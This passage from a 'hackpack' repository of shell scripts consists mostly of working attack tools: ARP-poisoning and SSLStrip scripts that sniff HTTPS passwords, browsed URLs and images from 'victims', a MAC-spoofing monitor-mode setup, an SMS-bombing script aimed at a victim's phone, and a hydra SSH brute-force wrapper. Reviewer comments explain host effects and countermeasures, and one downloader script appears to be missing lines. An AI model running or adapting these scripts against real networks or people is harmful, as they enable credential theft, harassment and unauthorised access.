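  head_request | sanitize | grep -v -e "Date:" -e "Set-Cookie" > "$nlog"

  if [[ -e "$log" ]] && ! cmp -s "$log" "$nlog"
  then
    echo "FOUND"
    diff "$log" "$nlog" | grep -e ">" -e "<"
    found_methods+=("HTTP[Diff]")
    break
  fi

  cp -- "$nlog" "$log"

  if ((i == QUERIES - 1))
  then
    echo "NOT FOUND"
  fi
done

rm -f -- "$nlog" "$log"

METHODS="${found_methods[*]}"

if [ "$METHODS" != "" ]
then
  echo
  echo "$DOMAIN does Load-balancing. Found via Methods: $METHODS"
  echo
else
  echo
  echo "$DOMAIN does NOT use Load-balancing."
  echo
fi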
153 |
154 |
--------------------------------------------------------------------------------
/hackpack/hackpack/n1tr0g3n_SSL_BT-5.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | echo
3 | echo
4 | echo
5 | echo ".##....##....##...########.########....#####....######....#######..##....##"
6 | echo ".###...##..####......##....##.....##..##...##..##....##..##.....##.###...##"
7 | echo ".####..##....##......##....##.....##.##.....##.##...............##.####..##"
8 | echo ".##.##.##....##......##....########..##.....##.##...####..#######..##.##.##"
9 | echo ".##..####....##......##....##...##...##.....##.##....##.........##.##..####"
10 | echo ".##...###....##......##....##....##...##...##..##....##..##.....##.##...###"
11 | echo ".##....##..######....##....##.....##...#####....######....#######..##....##"
12 | echo
13 | echo " n1tr0g3n's https password sniff3r";
14 | echo " www.n1tr0g3n.com & www.Top-Hat-Sec.com";
15 | echo
16 | echo "This script will attempt to install & update SSLStrip and Dsniff package";
17 | sleep 5
18 | echo
19 | sudo apt-get install sslstrip
20 | sudo apt-get install dsniff
21 | clear
22 | echo
23 | echo
24 | echo
25 | echo
26 | echo
27 | echo "**************************************************************************************************"
28 | echo "This script will create a folder named images on your desktop to save victims images from browser";
29 | echo "**************************************************************************************************"
30 | echo
31 | echo "**************************************************************************************************"
32 | echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
33 | echo "**************************************************************************************************"
34 | echo
35 | read -p "Press ENTER to continue with the script & begin SSL p0wnag3"
36 | clear
37 | echo
38 | echo
# This part of the script creates /root/Desktop/images, asks for an interface
# name, enables IPv4 forwarding, adds a NAT rule that redirects TCP port 80 to
# local port 10000, and starts driftnet, urlsnarf, ettercap and sslstrip in the
# background. The file ends after the sslstrip line: there is no cleanup step.
#
# Review notes (host state and network-visible effects):
# - $IFACE is read from stdin and passed unquoted and unvalidated to commands
#   that run under sudo.
39 | sudo mkdir /root/Desktop/images
40 | echo
41 | echo
42 | #This command will ask you for your interface name
43 | echo
44 | echo "Please type the name of your network interface in below";
45 | read IFACE;
46 | sleep 2
47 | #This will allow you to forward packets from the router
48 | echo
49 | echo
# Forwarding stays enabled after the script ends; nothing in this file writes
# 0 back to ip_forward.
50 | echo "1" > /proc/sys/net/ipv4/ip_forward
51 | echo
52 | echo
53 | echo
54 | #This will start driftnet to capture images on your computer
55 | sudo xterm -e driftnet -i $IFACE -d /root/Desktop/images &
56 | echo
57 | echo
58 | #This will start URLSnarf to show the websites the victim browses
59 | sudo xterm -e urlsnarf -i $IFACE &
60 | echo
61 | echo
62 | #this command will set up all redirection
# The rule is appended (-A) on every run and never deleted, so repeated runs
# stack identical REDIRECT rules and port-80 traffic keeps going to local port
# 10000 after sslstrip has stopped. `iptables -t nat -S PREROUTING` lists what
# is left on a host where this has run.
63 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
64 | echo
65 | echo
66 | #This command will start ettercap
# Both target specifications are empty (// //) and no -i is given, so the
# poisoning is not limited to one host and, unlike driftnet and urlsnarf, does
# not use $IFACE. On the wire this presumably appears as unsolicited ARP replies
# that map the gateway's IP address to this machine's MAC; switch-side ARP
# inspection or static gateway entries are the usual controls against it.
67 | sudo xterm -e ettercap -TqM ARP:REMOTE // // &
68 | echo
69 | echo
70 | #This command will start SSLStrip to start sniffing https:// passwords
71 | echo
# Only connections that start over plain HTTP on port 80 reach this listener
# (see the REDIRECT rule above); a browser that already requires HTTPS for a
# site (HSTS or a preload list) never sends that first plain-HTTP request.
72 | sudo sslstrip -l 10000 &
74 |
75 |
76 |
--------------------------------------------------------------------------------
/hackpack/hackpack/readysethack.py:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # -*- coding: utf-8 -*-
3 | #
4 | # readysethack.py
5 | #
6 | # Copyright 2013 written by: TH3CR4CK3R TOP-HAT-SEC.COM
7 | #
8 | # This program is free software; you can redistribute it and/or modify
9 | # it under the terms of the GNU General Public License as published by
10 | # the Free Software Foundation; either version 2 of the License, or
11 | # (at your option) any later version.
12 | #
13 | # This program is distributed in the hope that it will be useful,
14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | # GNU General Public License for more details.
17 | #
18 | # You should have received a copy of the GNU General Public License
19 | # along with this program; if not, write to the Free Software
20 | # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
21 | # MA 02110-1301, USA.
22 | #
23 | #
24 |
25 | clear
26 | echo ""
27 | echo " **** **** ** *** * * ***** ***** ***** * * ** **** * *"
28 | echo " * * * * * * * * * * * * * * * * * * * "
29 | echo " **** *** **** * * * ***** **** * ***** **** * **"
30 | echo " * * * * * * * * * * * * * * * * * *"
31 | echo " * * **** * * * * * ***** ***** * * * * * **** * *"
32 | echo ""
33 | echo ""
34 | echo ""
35 | echo ""
36 | sleep 2.5
37 | echo " #################################################################"
38 | echo " #################################################################"
39 | echo " ## THIS SCRIPT WILL PUT THE INTERFACE THAT YOU CHOOSE INTO ##"
40 | echo " ## MONITOR MODE. IT WILL THEN FAKE THE MAC FOR BOTH MONITOR ##"
41 | echo " ## MODE AND MANAGED MODE ##"
42 | echo " ## 00:11:22:33:44:55 IS THE DEFAULT MAC ADDRESS USED ##"
43 | echo " #################################################################"
44 | echo " #################################################################"
45 | echo ""
46 | echo ""
47 | echo ""
48 | echo " --------------------------------------------------------"
49 | echo " -----MAKE SURE THAT YOUR WIRELESS CARD IS CONNECTED-----"
50 | echo " --------------------------------------------------------"
51 | echo ""
52 | echo ""
53 | echo ""
54 | echo " **********************************************"
55 | echo " ******PRESS ENTER WHEN READY TO CONTINUE******"
56 | echo " **********************************************"
57 | echo
58 | read ENTER
59 | sleep 1
60 | clear
61 | echo
62 | airmon-ng
63 | echo
64 | echo " WHICH INTERFACE WOULD YOU LIKE TO USE? \c"
65 | read IFACE
66 | sleep 1
67 | clear
68 | echo ""
69 | echo ""
70 | echo " ###########################################################"
71 | echo " ###########################################################"
72 | echo " ## ##"
73 | echo " ## BOOSTING TXPOWER from 20 > 30 on $IFACE ##"
74 | echo " ## ##"
75 | echo " ###########################################################"
76 | echo " ###########################################################"
77 | sleep 3
78 | echo
79 | iw reg set BO
80 | echo
81 | iwconfig wlan0 txpower 30
82 | echo
83 | sleep 1
84 | clear
85 | echo ""
86 | echo ""
87 | echo ""
88 | echo " ##########################################################"
89 | echo " ################ PLEASE SELECT AN OPTION #################"
90 | echo " ##########################################################"
91 | echo " "
92 | echo " OPTION 1 - USE DEFAULT MAC ADDRESS"
93 | echo ""
94 | echo " OPTION 2 - USE CUSTOM MAC ADDRESS"
95 | echo ""
96 | echo " ENTER YOUR CHOICE [1/2]: \c"
97 | read option
98 |
99 |
100 |
101 | if [ $option = "2" ]; then
102 |
103 | echo
104 | echo ""
105 | echo " WHAT MAC ADDRESS WOULD YOU LIKE TO USE: \c"
106 | read MMAC
107 | sleep 0.75
108 | clear
109 | echo ""
110 | echo ""
111 | echo ""
112 | echo " #############################################################"
113 | echo " #############################################################"
114 | echo " ## ##"
115 | echo " ## BRINGING DOWN $IFACE TO CHANGE THE MAC ADDRESS ##"
116 | echo " ## ====SETTING TO: $MMAC ##"
117 | echo " #############################################################"
118 | echo " #############################################################"
119 | sleep 2
120 | echo
121 | ifconfig $IFACE down
122 | sleep 0.25
123 | macchanger -m $MMAC $IFACE
124 | sleep 0.25
125 | clear
126 | echo ""
127 | echo ""
128 | echo ""
129 | echo " ##############################################################"
130 | echo " ##############################################################"
131 | echo " ## ##"
132 | echo " ## BRINGING UP $IFACE..... THIS MAY TAKE A MOMENT ##"
133 | echo " ## ##"
134 | echo " ##############################################################"
135 | echo " ##############################################################"
136 | sleep 2
137 | ifconfig $IFACE up
138 | sleep 1.5
139 | clear
140 | echo ""
141 | echo ""
142 | echo ""
143 | echo " ##############################################################"
144 | echo " ##############################################################"
145 | echo " ## ##"
146 | echo " ## PUTTING $IFACE INTO MONITOR MODE ##"
147 | echo " ## ##"
148 | echo " ##############################################################"
149 | echo " ##############################################################"
150 | sleep 1.5
151 | airmon-ng start $IFACE
152 | sleep 0.5
153 | clear
154 | echo ""
155 | echo ""
156 | echo ""
157 | echo " ##############################################################"
158 | echo " ##############################################################"
159 | echo " ## ##"
160 | echo " ## NOW BRINGING DOWN Mon0 & AND CHANGING THE MAC ADDRESS ##"
161 | echo " ## ----CHANGING TO: $MMAC ##"
162 | echo " ##############################################################"
163 | echo " ##############################################################"
164 | echo ""
165 | echo ""
166 | sleep 2
167 | ifconfig mon0 down
168 | sleep 0.5
169 | echo ""
170 | macchanger -m $MMAC mon0
171 | sleep 0.25
172 | echo ""
173 | ifconfig mon0 up
174 | sleep 0.5
175 | clear
176 | echo ""
177 | echo ""
178 | echo ""
179 | echo " ##############################################################"
180 | echo " ##############################################################"
181 | echo " ## $IFACE HAS BEEN PUT INTO MONITOR MODE ##"
182 | echo " ## THE TXPOWER HAS BEEN SET TO:30 ##"
183 | echo " ## THE MAC ADDRESS OF BOTH $IFACE AND MON0 ##"
184 | echo " ## HAVE BEEN SPOOFED TO: $MMAC ##"
185 | echo " ##############################################################"
186 | echo " ##############################################################"
187 | echo ""
188 | echo ""
189 | echo ""
190 | echo ""
191 | echo ""
192 | echo ""
193 | echo ""
194 | echo " PRESS ENTER TO START HACKING: \c"
195 | read ENTER
196 | sleep 0.5
197 | exit
198 |
199 |
200 | else
201 | if [ $option = "1" ]; then
202 |
203 | clear
204 | echo ""
205 | echo ""
206 | echo ""
207 | echo " #############################################################"
208 | echo " #############################################################"
209 | echo " ## ##"
210 | echo " ## BRINGING DOWN $IFACE TO CHANGE THE MAC ADDRESS ##"
211 | echo " ## ====SETTING TO: 00:11:22:33:44:55 ##"
212 | echo " #############################################################"
213 | echo " #############################################################"
214 | sleep 2
215 | echo
216 | ifconfig $IFACE down
217 | sleep 0.25
218 | echo
219 | macchanger -m 00:11:22:33:44:55 $IFACE
220 | sleep 0.25
221 | clear
222 | echo ""
223 | echo ""
224 | echo ""
225 | echo " ##############################################################"
226 | echo " ##############################################################"
227 | echo " ## ##"
228 | echo " ## BRINGING UP $IFACE..... THIS MAY TAKE A MOMENT ##"
229 | echo " ## ##"
230 | echo " ##############################################################"
231 | echo " ##############################################################"
232 | sleep 2
233 | echo
234 | ifconfig $IFACE up
235 | sleep 1
236 | clear
237 | echo ""
238 | echo ""
239 | echo ""
240 | echo " ##############################################################"
241 | echo " ##############################################################"
242 | echo " ## ##"
243 | echo " ## PUTTING $IFACE INTO MONITOR MODE ##"
244 | echo " ## ##"
245 | echo " ##############################################################"
246 | echo " ##############################################################"
247 | sleep 1.5
248 | airmon-ng start $IFACE
249 | sleep 0.5
250 | clear
251 | echo ""
252 | echo ""
253 | echo ""
254 | echo " ##############################################################"
255 | echo " ##############################################################"
256 | echo " ## ##"
257 | echo " ## NOW BRINGING DOWN Mon0 & AND CHANGING THE MAC ADDRESS ##"
258 | echo " ## ----CHANGING TO: 00:11:22:33:44:55 ##"
259 | echo " ##############################################################"
260 | echo " ##############################################################"
261 | sleep 2
262 | ifconfig mon0 down
263 | sleep 0.5
264 | echo
265 | macchanger -m 00:11:22:33:44:55 mon0
266 | echo
267 | sleep 0.25
268 | ifconfig mon0 up
269 | sleep 0.5
270 | echo
271 | sleep 1
272 | clear
273 | echo ""
274 | echo ""
275 | echo ""
276 | echo " ##############################################################"
277 | echo " ##############################################################"
278 | echo " ## $IFACE HAS BEEN PUT INTO MONITOR MODE ##"
279 | echo " ## THE TXPOWER HAS BEEN SET TO:30 ##"
280 | echo " ## THE MAC ADDRESS OF BOTH $IFACE AND mon0 ##"
281 | echo " ## HAVE BEEN SPOOFED TO: 00:11:22:33:44:55 ##"
282 | echo " ##############################################################"
283 | echo " ##############################################################"
284 | echo ""
285 | echo ""
286 | echo ""
287 | echo ""
288 | echo ""
289 | echo ""
290 | echo ""
291 | echo " PRESS ENTER TO START HACKING: \c"
292 | read ENTER
293 | sleep 0.5
294 | exit
295 |
296 |
297 |
298 | fi
299 | fi
300 |
--------------------------------------------------------------------------------
/hackpack/hackpack/smskiller.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Interactive script. As listed it: installs mailutils and ssmtp with apt-get,
# appends Gmail SMTP settings (including the account password) to
# /etc/ssmtp/ssmtp.conf, asks for a phone number, carrier, subject and message,
# and then mails the same message repeatedly to the carrier's e-mail-to-SMS
# gateway address with a fixed pause between sends.
#
# NOTE(review): the shebang is /bin/sh, but the script uses `echo -e`,
# `echo -n` and `select`; `select` is a bash/ksh feature, so behaviour depends
# on which shell /bin/sh points to.
#########################################################
#########################################################
# SMSKILLER{BOMBER} H4CKN3T VERSION #
# THIS IS FREE SOFTWARE TO USE AND DISTRIBUTE #
# NOTE(review): as listed, the next line has no leading '#', so the shell
# would try to run it as a command named INSPIRED (the trailing '#' only
# starts a comment at the end of that line).
INSPIRED BY 2600 WINTER ISSUE #
# WWW.H4CKN3T.COM #
# 11-12-2010 #
#########################################################
#########################################################
# ANSI colour escape sequences used by the `echo -e` banners below.
red='\e[0;31m'
RED='\e[1;31m'
blue='\e[0;34m'
BLUE='\e[1;34m'
cyan='\e[0;36m'
CYAN='\e[1;36m'
NC='\e[0m' # No CoLOR


clear
# NOTE(review): the `exit 1` runs inside a ( ... ) subshell, so it ends only
# that subshell; when the caller is not root the message is printed and the
# script carries on.
test "$(whoami)" != 'root' && (echo YOU MUST BE ROOT TO RUN THIS SCRIPT; exit 1)
# Connectivity check: collects every non-loopback address from lines of
# ifconfig output containing 'inet addr:'. $IP is unquoted in the test, so
# more than one address makes `[ -z ... ]` receive several words.
IP=`ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
if [ -z $IP ]; then
clear;echo;echo;echo " YOU MUST BE CONNECTED TO THE INTERNET TO RUN SCRIPT"
exit 1
fi
echo -e " ${CYAN} #######################################################"
echo " #######################################################"
echo " SMSKILLER "
echo " THE H4CKN3T VERSION - "
echo " THIS IS FREE SOFTWARE TO USE AND DISTRIBUTE "
echo " WWW.H4CKN3T.COM "
echo " 11-12-2010 "
echo " #######################################################"
echo " #######################################################"
sleep 3;echo;
echo
echo -e " ${RED} BY CONTINUING USING THIS SOFTWARE YOU AGREE THAT THIS WAS MADE"
echo " FOR TESTING PURPOSES ONLY, AND YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS"
sleep 5;clear
echo;echo;echo;
echo -e " ${CYAN} THIS SCRIPT WILL INSTALL MAILUTILS AND SSMTP. (apt-get install mailutils, apt-get install ssmtp)"; sleep 3
# Package installation. The trailing '&' puts this echo in the background.
echo " ${CYAN} ... CHECKING FOR DEPENDINCIES (MAILUTILS) ..." &
echo;echo

# The exit status of this first install is not checked.
apt-get install mailutils -y
clear;echo;
echo " NOW INSTALLING SSMTP"
echo;echo;

apt-get install ssmtp -y
# $? here is the status of the ssmtp install only.
if [ "$?" != 0 ];then
echo " SOMETHING WENT WRONG. CAN'T DOWNLOAD NEEDED FILES"
exit 1
fi

clear;echo;echo;

echo -n " ENTER GMAIL ADDRESS TO USE (ex. myemail@gmail.com): "
read AuthUser
echo;echo;
# The password is read with terminal echo on (the prompt says so).
echo -n " ENTER GMAIL ADDRESS PASSWORD (passwd WILL echo to screen): "
read AuthPass
clear;echo;echo;echo " NOW SETTING UP CONFIG FILE WITH DATA"

# NOTE(review): the mail account and its password are appended in plaintext to
# the system-wide ssmtp configuration. '>>' appends, so every run adds another
# copy of these five lines, and nothing in this script removes them afterwards
# or sets the file's permissions. Anyone auditing a host should treat an
# AuthPass entry here as an exposed credential.
echo "AuthUser=$AuthUser" >> /etc/ssmtp/ssmtp.conf
echo "AuthPass=$AuthPass" >> /etc/ssmtp/ssmtp.conf
echo "FromLineOverride=YES" >> /etc/ssmtp/ssmtp.conf
echo "mailhub=smtp.gmail.com:587" >> /etc/ssmtp/ssmtp.conf
echo "useSTARTTLS=YES" >> /etc/ssmtp/ssmtp.conf

echo " INITIAL SETUP IS COMPLETE .. NOW STARTING ATTACK "
sleep 3
echo -n "ENTER VICTIM'S MOBILE NUMBER: "
read NUM

echo;echo;

# Carrier menu; `break` leaves the menu after the first answer, whether or not
# it was a valid entry.
PS3="Choose (1-5):"
echo ""
echo "CHOOSE A CARRIER BELOW"
echo "<><><><><>"
select CARRIER in ATT BOOST VERIZON VIRGIN ALLTEL
do
break
done

# These five gateway-domain variables are assigned but not referenced anywhere
# in the visible listing; the case statement below repeats the literals.
ATT=@txt.att.net
BOOST=@myboostmobile.com
VERIZON=@vtext.com
VIRGIN=@vmobl.com
ALLTELL=@message.alltel.com

# Default recipient address, kept when no case arm below matches.
NUMBER=${NUM}@txt.att.net

# The menu entry is spelled ALLTEL while the arm below is ALLTELL, so that
# selection falls through to the empty '*)' arm.
case $CARRIER in
ATT)
NUMBER=${NUM}@txt.att.net
;;
BOOST)
NUMBER=${NUM}@myboostmobile.com
;;
VERIZON)
NUMBER=${NUM}@vtext.com
;;
VIRGIN)
NUMBER=${NUM}@vmobl.com
;;
ALLTELL)
NUMBER=${NUM}@message.alltel.com
;;

*)
;;
esac
echo;echo;
echo -n " ENTER SUBJECT: "
read SUBJECT
echo;echo;
echo " USING $CARRIER ";sleep 1;echo;echo
echo -n "ENTER A SHORT MESSAGE: "
read MESSAGE

echo;echo;

echo -n "ATTACKING $NUMBER ";echo;
echo -n "CONTINUE ... (Y/N): )"
read NEXT

# Only lowercase 'n' and 'y' are recognised; any other answer ends the script.
# $NEXT is unquoted in the first test, so an empty answer makes `[` report an
# error.
if [ $NEXT = n ];then
echo "RESTARTING";echo;echo;
# Starts a new copy of the script, resolved relative to the current directory.
./smskiller.sh
elif [ "$NEXT" = y ];then
# The message body is written to 1.txt in the current directory and is not
# removed afterwards.
echo $MESSAGE > 1.txt
echo "HOW MANY MESSAGE DO YOU WANNA SEND: "
read SMS
echo;echo
echo "NUMBER OF SECONDS BETWEEN MESSAGES: "
read SPEED
COUNTER=0
# Sends 1.txt through `mail` $SMS times, sleeping $SPEED seconds after each
# send. $SMS, $SPEED and $NUMBER are used unquoted and unvalidated.
until [ $SMS -le $COUNTER ];do
cat 1.txt | mail -s "$SUBJECT" $NUMBER
sleep $SPEED
COUNTER=$(( $COUNTER + 1 ))
echo "CTRL + C TO CALL OFF ATTACK ... "
done
fi
150 |
151 |
152 |
153 |
154 |
155 |
--------------------------------------------------------------------------------
/hackpack/hackpack/soundcloud.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#soundcloud music downloader by http://360percents.com
#development: https://github.com/lukapusic/soundcloud-dl/
#Author: Luka Pusic
#
# Usage: soundcloud.sh <page URL>
# Fetches the given page with curl, extracts an owner id from it, asks the
# sndcdn API for that user's tracks and downloads each stream with curl.
#
# NOTE(review): this listing looks damaged by extraction. The loop body jumps
# from file line 31 to 35, the `grep ""` in the title pipeline appears to have
# lost its pattern, and neither $songID nor $filename is assigned anywhere in
# the visible text. Recover the original file before running or changing it.

echo "[i] soundcloud.com music downloader by http://360percents.com (cURL version)";

# No argument: print usage and exit (plain `exit`, so the status is that of
# the preceding echo).
if [ -z "$1" ]; then
echo "";echo "[i] Usage: `basename $0` http://soundcloud.com/link_with_tracks_on_page";echo "";exit
fi

command -v curl &>/dev/null || { echo "[!] Curl needs to be installed."; exit 1; }

echo "[i] Grabbing artists page"
# $1 is passed to curl unquoted, so it is subject to word splitting and
# globbing, and a value starting with '-' would be read as a curl option.
page=$(curl -L -s --user-agent 'Mozilla/5.0' $1)
# API client id is hard-coded; the commented-out pipeline would have scraped
# it from the page instead.
clientID="b45b1aa10f1ac2941910a7f0d10f8e28" #$(echo "$page" | grep "clientID" | tr "," "\n" | grep "clientID" | cut -d '"' -f 4)
#echo "Client id is: $clientID"
# First "trackOwnerId" value found in the page, taken by splitting on ',' and ':'.
artistID=$(echo "$page" | tr "," "\n" | grep "trackOwnerId" | head -n 1 | cut -d ":" -f 2)
#echo "Artist id is: $artistID"
echo "[i] Grabbing all song info"
# Response is flattened to one line, re-split on "stream-item>" and filtered to
# lines containing "integer" -- presumably one line per track; confirm against
# the API response format.
songs=$(curl -s -L --user-agent 'Mozilla/5.0' "https://api.sndcdn.com/e1/users/$artistID/sounds?limit=256&offset=0&linked_partitioning=1&client_id=$clientID" | tr -d "\n" | sed 's/stream\-item\>/\n/g' | grep "integer")
# `echo "" | wc -l` is 1, so this reports one song even when $songs is empty;
# the emptiness check only happens afterwards.
songcount=$(echo "$songs" | wc -l)
echo "[i] Found $songcount songs!"

if [ -z "$songs" ]; then
echo "[!] No songs found at $1" && exit
fi

for (( i=1; i <= $songcount; i++ ))
do
# Takes the i-th line of $songs and cuts a title out of it.
title=$(echo "$songs" | sed -n "$i"p | tr ">" "\n" | grep "" | head -n 1 | cut -d ">" -f 2 | cut -d "<" -f 1)
#echo "Song id is $songID"
# Fourth double-quote-delimited field of the streams response, with \u0026
# unescaped to '&'.
url=$(curl -s -L --user-agent 'Mozilla/5.0' "https://api.sndcdn.com/i1/tracks/$songID/streams?client_id=$clientID" | cut -d '"' -f 4 | sed 's/\\u0026/\&/g')
# NOTE(review): the output file name presumably derives from the remote title
# (its assignment is not visible here); if so it is server-controlled text and
# should be stripped of '/' and leading '.' before being used as a path.
curl -L --user-agent 'Mozilla/5.0' -o "$filename" "$url";
done
39 |
40 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ssh_crack3r.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Interactive wrapper: prompts for a host address, a login name and a wordlist
# path, then passes them to hydra's ssh module with 16 parallel tasks.
#
# Reviewer notes:
#  - The three answers reach the hydra command line unquoted, so each one is
#    word-split and glob-expanded by the shell before hydra sees it.
#  - On the receiving side this shows up as a burst of failed logins for one
#    account in the SSH server's authentication log; key-only authentication
#    and per-source rate limiting are the usual countermeasures.

# Print $1 empty lines.
spacer() {
  local k
  for ((k = 0; k < $1; k++)); do
    echo
  done
}

clear
spacer 3
printf '%s\n' " +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+"
printf '%s\n' " |n|1|t|r|0|g|3|n |S|S|H|_|C|r|a|c|k|3|r|"
printf '%s\n' " +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+"
spacer 2
printf '%s\n' " Created by: n1tr0g3n"
printf '%s\n' " Website : www.n1tr0g3n.com || www.top-hat-sec.com"
spacer 1
printf '%s\n' " <-----HackMiami.org ----->"
spacer 1
sleep 7

# Address of the SSH service.
clear
spacer 4
printf '%s\n' " Enter the IP address of the connection using SSH you would like to attack Example: 192.168.0.18"
read -e VIP

# Login name to try.
clear
spacer 4
printf '%s\n' " Enter the User name of the victim you would like to attack Example: root "
read -e VICTIM

# Path to the password wordlist.
clear
spacer 4
printf '%s\n' "Enter the loaction of your dictionary file used for this attack Example: /root/Desktop/pass.txt "
read -e DICT

spacer 7
printf '%s\n' " Target is now being attacked biotch!"
spacer 4

# hydra's own output follows; its exit status is not inspected.
hydra -l $VICTIM -P $DICT -t 16 $VIP ssh

spacer 3
printf '%s\n' " hope you pwn3d someone now get to work!"
sleep 8
spacer 4
exit
68 |
69 |
70 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ssl_phucker.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Interactive menu script. For the chosen option it enables IPv4 forwarding,
# redirects inbound TCP port 80 to local port 8080 with an iptables nat rule,
# and starts driftnet, urlsnarf, ettercap (ARP man-in-the-middle mode) and
# sslstrip listening on 8080. Pressing ENTER runs a cleanup block.
#
# Reviewer notes on what the cleanup does to the machine it runs on:
#  - `iptables --flush` / `--delete-chain` (filter and nat tables) remove every
#    rule and user-defined chain, not just the one REDIRECT rule added here,
#    so any existing host firewall policy is lost.
#  - ip_forward is written as 0 regardless of its value before the run.
#  - `killall xterm` ends every xterm process, including unrelated ones.
#  - Some commands are prefixed with sudo while the /proc write and the
#    cleanup iptables calls are not, so the script as a whole needs root.
# Defender's view: the setup depends on ARP cache poisoning and on clients
# starting over plain HTTP; dynamic ARP inspection and HSTS address those.
clear
# This script was written by me n1tr0g3n with a lot of input from R4V3N747700 and help from all the guys on the Top-Hat-Sec.com Forum.
# Thanks to TAPE for his input and suggestions which were utilized into the script to make it more functional. And a special thanks to my lovely girlfriend who puts up with me being on the computer all the time, I love you with all my heart. We do this for the security community and hope you guys enjoy our work. Thanks for using the script and we hope it works well for you.
echo
echo ""
echo ""
echo ""
echo ""
echo ""
echo " n1tr0g3n's all in one Network Sniffer";
echo ""
echo " coded with help by R4V3N747700"
echo ""
echo " www.n1tr0g3n.com & www.Top-Hat-Sec.com";


sleep 3
clear
echo ""
echo ""
echo "--------------------------------------------------------------------------------------------------"
echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
echo "--------------------------------------------------------------------------------------------------"
echo ""
echo " If SSLstrip gives you errors please rerun the script"
echo ""
echo " when done with the attack click ENTER in the ettercap window to cleanup"
echo ""
echo ""
sleep 4
clear


# Ask for the network interface name; it is later passed unquoted to
# driftnet, urlsnarf and (options 2 and 4) ettercap.
echo
echo "Please type the name of your network interface in below";
read IFACE;
sleep 2
echo ""
echo ""
clear
echo ""
echo " ----------------------------------------------------------------------------------"
echo ""
echo " |-----------------------------------| |-----------------------------------|"
echo " | Attack Entire Gateway | | Attack single host |"
echo " | | | |"
echo " | 1 For LAN attack | | 3 For LAN attack |"
echo " | 2 For Wireless Attack | | 4 For Wireless Attack |"
echo " |-----------------------------------| |-----------------------------------|"
echo ""
echo " ----------------------------------------------------------------------------------"
echo ""
echo ""
echo ""
echo " Select Menu Option: "
read menuoption
# $menuoption is unquoted in every test below; an empty answer makes `[`
# report an error in each branch and nothing runs.
# ---- Option 1: whole segment, ettercap without -i and with empty targets ----
if [ $menuoption = "1" ]; then

# Shows the gateway column of default-route lines from `route -n`.
echo "This should be your Gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
# NOTE(review): GATEWAY is read here but not used by any command in this
# branch; ettercap below is started with `// //`.
echo "Please type the IP of your Gateway in below";
read GATEWAY;
echo ""
echo ""
echo "Starting attack on Gateway"
route -n | grep 'UG[ \t]' | awk '{print $2}'
sleep 2
# Enable IPv4 packet forwarding on this host.
echo "1" > /proc/sys/net/ipv4/ip_forward


# Start driftnet in its own xterm on the chosen interface.
sudo xterm -e driftnet -i $IFACE &


# Start urlsnarf in its own xterm on the chosen interface.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect inbound TCP port 80 to local port 8080 (where sslstrip listens).
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


# Start ettercap in text/quiet mode with ARP:REMOTE and empty target specs.
ettercap -TqM ARP:REMOTE // // &


# Start sslstrip on port 8080 in its own xterm.
sudo xterm -e sslstrip -a -l 8080 &
echo
echo "Press ENTER to stop session"
read ENTERKEY

# Cleanup: see the header notes; this flushes all iptables rules.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# ---- Option 2: gateway as target 1, ettercap bound to $IFACE ----
if [ $menuoption = "2" ]; then

# Show the detected gateway, then ask for it.
echo "This should be your gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY;
echo ""

echo "Starting attack on gateway"
route -n | grep 'UG[ \t]' | awk '{print $2}'
sleep 2


# Enable IPv4 packet forwarding on this host.
echo "1" > /proc/sys/net/ipv4/ip_forward


# Start driftnet in its own xterm on the chosen interface.
sudo xterm -e driftnet -i $IFACE &


# Start urlsnarf in its own xterm on the chosen interface.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect inbound TCP port 80 to local port 8080 (where sslstrip listens).
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


# Start ettercap on $IFACE with the typed gateway as the first target.
ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY/ // &
#sudo xterm -e ettercap -TqM ARP:REMOTE // // & -----> command for LAN


# Start sslstrip on port 8080 in its own xterm.
sudo xterm -e sslstrip -a -l 8080 &


echo "Press ENTER to stop session"
read ENTERKEY

# Cleanup: see the header notes; this flushes all iptables rules.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# ---- Option 3: gateway and a single host, ettercap without -i ----
if [ $menuoption = "3" ]; then
# Show the detected gateway, then ask for gateway and host addresses.
echo ""
echo ""
echo "This should be your gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY3;
echo ""
echo ""
echo "Please type the IP of the target host below";
read HOST3;
echo ""
echo ""
echo " Starting Attack on Target Host"
sleep 2


# Enable IPv4 packet forwarding on this host.
echo "1" > /proc/sys/net/ipv4/ip_forward


# Start driftnet in its own xterm on the chosen interface.
